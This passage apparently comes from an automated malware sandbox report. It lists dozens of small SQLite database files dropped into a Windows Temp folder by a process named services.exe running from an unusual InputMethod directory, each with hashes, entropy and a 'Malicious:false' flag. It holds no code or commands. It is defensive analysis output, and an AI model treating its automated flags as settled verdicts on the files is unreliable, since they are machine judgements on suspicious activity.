                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\p7hpNEKqWS

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\pkOvVXzdYG

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\pwhus6M2yR

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\q3ruztWTol

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qLqjY5X4dY

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qPOmKSrMww

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qfNzwgbTxb

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qfl5sTclEy

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qj3fmfnfq0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qnIXtpZA2z

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qpFzr9lVMh

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\qrCXgKFeXX

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ra622pRlHs

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\rvLCnUuNlo

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\sIsNdvpKfR

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\sJYRWFPIyt

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\tiW8e8y9Oq

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\tpy8SAhmvx

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\u6XrA9boea

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\uXwYCcPUD8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\uYJiYgNb6j

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\uamEna40Ug

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ug06ln7rLg

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ve6GV0Aufo

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\wE9Ave0HPL

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
